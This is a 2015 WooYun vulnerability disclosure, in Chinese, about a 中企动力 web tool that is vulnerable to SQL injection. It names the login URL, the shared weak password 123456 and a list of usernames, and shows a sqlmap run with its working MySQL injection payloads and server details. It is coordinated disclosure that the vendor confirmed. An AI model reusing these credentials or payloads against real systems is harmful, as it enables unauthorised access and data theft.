当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135665

漏洞标题:中企动力科技股份有限公司某站弱口令+注入/威胁核心库

相关厂商:中企动力科技股份有限公司

漏洞作者: 凌零1

提交时间:2015-08-20 17:56

修复时间:2015-10-04 20:06

公开时间:2015-10-04 20:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-20: 细节已通知厂商并且等待厂商处理中
2015-08-20: 厂商已经确认,细节仅向厂商公开
2015-08-30: 细节向核心白帽子及相关领域专家公开
2015-09-09: 细节向普通白帽子公开
2015-09-19: 细节向实习白帽子公开
2015-10-04: 细节向公众公开

简要描述:

000

详细说明:

前人来过 WooYun: 中企动力商务销售工具弱口令
算是捡漏吧!
http://www.cetools.cn/index.php/cetools/login弱口令蛮多的
密码统一123456

wangjing   123456
zhangping
zhangtingting
zhangtao
wangjuan
wanggang
wangying
zhangxin
wangting
chenlong
wangjing
wangying
zhaojing


id无单引号保护,存在注入

%VTA1J7P8W{DUZ)J@($XV$T.png


漏洞证明:

C:\Python27\sqlmap>sqlmap.py -r C:\Users\wjl\Desktop\新建文本文档.txt -p "id" --
current-db
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150609}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 17:22:27
[17:22:27] [INFO] parsing HTTP request from 'C:\Users\wjl\Desktop\新建文本文档.t
xt'
[17:22:27] [INFO] resuming back-end DBMS 'mysql'
[17:22:27] [INFO] testing connection to the target URL
you provided a HTTP Cookie header value. The target URL provided its own cookies
within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n]
[17:22:29] [INFO] heuristics detected web page charset 'ascii'
[17:22:29] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3283 AND 9558=9558
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
Payload: id=3283 AND (SELECT 2836 FROM(SELECT COUNT(*),CONCAT(0x717a6a7171,(
SELECT (ELT(2836=2836,1))),0x7176706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHE
MA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=3283 AND (SELECT * FROM (SELECT(SLEEP(5)))gYlP)
---
[17:22:30] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2000 or 7
web application technology: Apache 2.0.54, PHP 5.2.17
back-end DBMS: MySQL 5.0
[17:22:30] [INFO] fetching current database
[17:22:31] [WARNING] reflective value(s) found and filtering out
[17:22:31] [INFO] retrieved: zmobile
current database: 'zmobile'
[17:22:31] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[17:22:31] [INFO] fetched data logged to text files under 'C:\Users\wjl\.sqlmap\
output\www.cetools.cn'


15个库:

]HUO)9OL0G%D4N7EYWJNVEB.png


3J8EHB)9}20N$U]4W6PLR3E.png


修复方案:

你们懂

版权声明:转载请注明来源 凌零1@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-20 20:04

厂商回复:

正在处理。谢谢。

最新状态:

暂无


漏洞评价:

评论